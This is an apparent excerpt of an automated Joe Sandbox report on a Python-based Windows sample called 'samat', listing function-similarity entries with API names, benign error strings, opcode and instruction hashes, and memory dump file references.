                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Arg_InitializeParseTuple
                                                                                                                                                                                                                                                                                      • String ID: :Initialize$InitializeAcl
                                                                                                                                                                                                                                                                                      • API String ID: 1991639834-2627007299
                                                                                                                                                                                                                                                                                      • Opcode ID: 393eb0023e6c4a67651202f94622b7c3e74f33b7195f251b897bfafc05145604
                                                                                                                                                                                                                                                                                      • Instruction ID: 582f810232a1a1fc8064da17c7190cc49628589e371b2524caba18fa469e41b0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 393eb0023e6c4a67651202f94622b7c3e74f33b7195f251b897bfafc05145604
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C9F04F62F0870682FB598BAEE85017D2395AF48FC4F884035DB0D463B1EE3CE596D340
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FromString$CharErr_Unicode_Wide
                                                                                                                                                                                                                                                                                      • String ID: The string is too long
                                                                                                                                                                                                                                                                                      • API String ID: 1358704699-1150129668
                                                                                                                                                                                                                                                                                      • Opcode ID: 3e50894a2f6329b4e245a6427f8e7c1b14ee148e69ae879c50c0a09b0fbc83e2
                                                                                                                                                                                                                                                                                      • Instruction ID: 84833e37d77424abc891aa06cfde1fa296886a5900b067b605e15fba7b69d092
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e50894a2f6329b4e245a6427f8e7c1b14ee148e69ae879c50c0a09b0fbc83e2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 51011272A18B8185FB609B18E8513BD63A0FF8DF94FC40231D65E466F6DE3CD1558700
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • PyEval_SaveThread.PYTHON313 ref: 00007FF8B7E8543A
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32 ref: 00007FF8B7E85447
                                                                                                                                                                                                                                                                                      • PyEval_RestoreThread.PYTHON313 ref: 00007FF8B7E85452
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8C400: GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C41B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8C400: FormatMessageW.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C48A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8C400: PyUnicode_DecodeMBCS.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C568
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8C400: Py_BuildValue.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C57D
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8C400: LocalFree.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C595
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8C400: PyErr_SetObject.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C5AA
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Eval_Thread$BuildCloseDecodeErr_ErrorFormatFreeHandleLastLocalMessageObjectRestoreSaveUnicode_Value
                                                                                                                                                                                                                                                                                      • String ID: CloseHandle
                                                                                                                                                                                                                                                                                      • API String ID: 2231686540-2962429428
                                                                                                                                                                                                                                                                                      • Opcode ID: 083de3100d951dd9bdb6f7860e10261bd61e50a463827633fdd8d26adf2132cc
                                                                                                                                                                                                                                                                                      • Instruction ID: 557e1d48b308a84f6857936c5c21dc86df9324ba8370eae10a0d1ae5b3a45d19
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 083de3100d951dd9bdb6f7860e10261bd61e50a463827633fdd8d26adf2132cc
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D0F04F26A1874182EB509B9AB44436D62A1EF98BC4F590030EB4E43776DE3CD8828740
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: __current_exception__current_exception_contextterminate
                                                                                                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                                                                                                      • API String ID: 2542180945-1018135373
                                                                                                                                                                                                                                                                                      • Opcode ID: 3b4c1db84a87a6fdb22006f661c73e75c067a881438bcbb587b3e6fc569e0f3a
                                                                                                                                                                                                                                                                                      • Instruction ID: 5fa28b84166262f6b7267450ce60d2a0bd5fd2bed0754fbcc118bdb63f364ca8
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3b4c1db84a87a6fdb22006f661c73e75c067a881438bcbb587b3e6fc569e0f3a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E2F0B432A0430685FB155F29E18406D33A1FF18F84FA48830DB480B667DE3CE9A0C701
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: __current_exception__current_exception_contextterminate
                                                                                                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                                                                                                      • API String ID: 2542180945-1018135373
                                                                                                                                                                                                                                                                                      • Opcode ID: b86dd0a1a1710a2c7cd3376dcc4a259a6d59bebf1e1d349f78f65613216423d0
                                                                                                                                                                                                                                                                                      • Instruction ID: f5095a06b2acb5dc24835b70d53ef3800cc0c7ca01f2997839a0f3a0f7a3335b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b86dd0a1a1710a2c7cd3376dcc4a259a6d59bebf1e1d349f78f65613216423d0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 22F0E237605B45CAD7559F69E8801AC3364FB49B88F995120FB4D4B766CF38D8A08700
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: From$CharStringUnicode_Widewsprintf
                                                                                                                                                                                                                                                                                      • String ID: IID('%ws')
                                                                                                                                                                                                                                                                                      • API String ID: 3341265217-2301737843
                                                                                                                                                                                                                                                                                      • Opcode ID: 74d81495bdbc85cec00b5cd67ca454c2b63e3e3fa1d9bcce47121b153791d4b7
                                                                                                                                                                                                                                                                                      • Instruction ID: 3817b34bd035fe01a57b5519241f519c89305dad7fd292afc3f3b4d5d21f5978
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 74d81495bdbc85cec00b5cd67ca454c2b63e3e3fa1d9bcce47121b153791d4b7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B9F0E162A18B8691EB609B54E4553ED6370FF89BA4F800331D6AD076F5DF3CD159CB00
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • RECT must be a tuple of 4 ints (left, top, right, bottom), xrefs: 00007FF8B7E8D35E
                                                                                                                                                                                                                                                                                      • llll;RECT must be a tuple of 4 ints (left, top, right, bottom), xrefs: 00007FF8B7E8D38E
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Arg_Err_ParseStringTuple
                                                                                                                                                                                                                                                                                      • String ID: RECT must be a tuple of 4 ints (left, top, right, bottom)$llll;RECT must be a tuple of 4 ints (left, top, right, bottom)
                                                                                                                                                                                                                                                                                      • API String ID: 385655187-1420951713
                                                                                                                                                                                                                                                                                      • Opcode ID: 4fb09c2bb181abc938ff80eaaac510f2ee71be2d2c87fa52025b76ed328b3842
                                                                                                                                                                                                                                                                                      • Instruction ID: 131e6a069e76b624e30b633a42a2ad18a53aa467773e5f8599365afce26f1110
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4fb09c2bb181abc938ff80eaaac510f2ee71be2d2c87fa52025b76ed328b3842
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13F0DAA6A04B85A6DB10CB59D4441AD77A0FF89FD4FC58136DA4D43331EE3CD159C700
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2718003287-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                                                                      • Instruction ID: ca859f0debb260d3f94ba8c9b9133667254b6a4473089241e7fd301a5f4fd0f6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C9D12273B08A818AE711DF65C8412FCB7B9FB54798B80423ACE4E97B89DE78D016C311
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E12DCF4B), ref: 00007FF7E12DD07C
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E12DCF4B), ref: 00007FF7E12DD107
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 953036326-0
                                                                                                                                                                                                                                                                                      • Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                                                                      • Instruction ID: c5de0c1b016dee6c47ffbce7ae589440efd151e77c4f1596e05190f260b07dbd
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C491C523F18A5646F760AF65D8423BDABA8EB40788F94413BDE0E566C5CFB8D441C722
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4170891091-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                                                                      • Instruction ID: af7e52b8bf652f0943a9ff1549d97317046fe9f25e8a1db069cdcf1377013d55
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95511673F042118AEB14EF64DD527FCA7A9AB4835CF900236DD1E52AE5EB78A803C715
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2780335769-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                                                                                      • Instruction ID: 68d407348311a22b462f5e677f37e7a4871fb1f43063355b534e63c4c1ebbdaf
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1519263F046418AF710EF70D8523BDA7B9BB48758F908436DE0D97688DFB8D4808762
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Err_FreeMem_Memoryfreemalloc
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 182096997-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 5a0dd487b60a1102b4735315523d65cbd22cac1ecefffe0ac02d4da6dfbaffd5
                                                                                                                                                                                                                                                                                      • Instruction ID: 7f6015cf3af06a79302218e6a19e133ed6543ad668a9bfe2206e8fe6a618339a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5a0dd487b60a1102b4735315523d65cbd22cac1ecefffe0ac02d4da6dfbaffd5
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A7417663A14B9686EA119F59A4002AEB7B5FF94FE4F884232DF1C137A5EE3CD8558700
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1956198572-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                                                                      • Instruction ID: bdb3119776480670bd33c00a24fb90074b6b5d7000cde9b4a31b5e9c0cd29130
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A111E925B0C14282FB55A76AED463799296FFC4780FC48033DB4907B8ACDFDD581C212
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: memset$Referencemalloc
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3353409452-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 702a331324a4662ae84315dbd7bb521fc5055dc9d41250d5f85af3e01e8bffa1
                                                                                                                                                                                                                                                                                      • Instruction ID: 27b56438d650e50c3f8ba5c00c7f94177e13bc51aa1552f050e164e360dc9c32
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 702a331324a4662ae84315dbd7bb521fc5055dc9d41250d5f85af3e01e8bffa1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B9113522A18B4496E720CF6AF48006EB770FF88F80B455039EB9E83B25EF7CE0518744
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
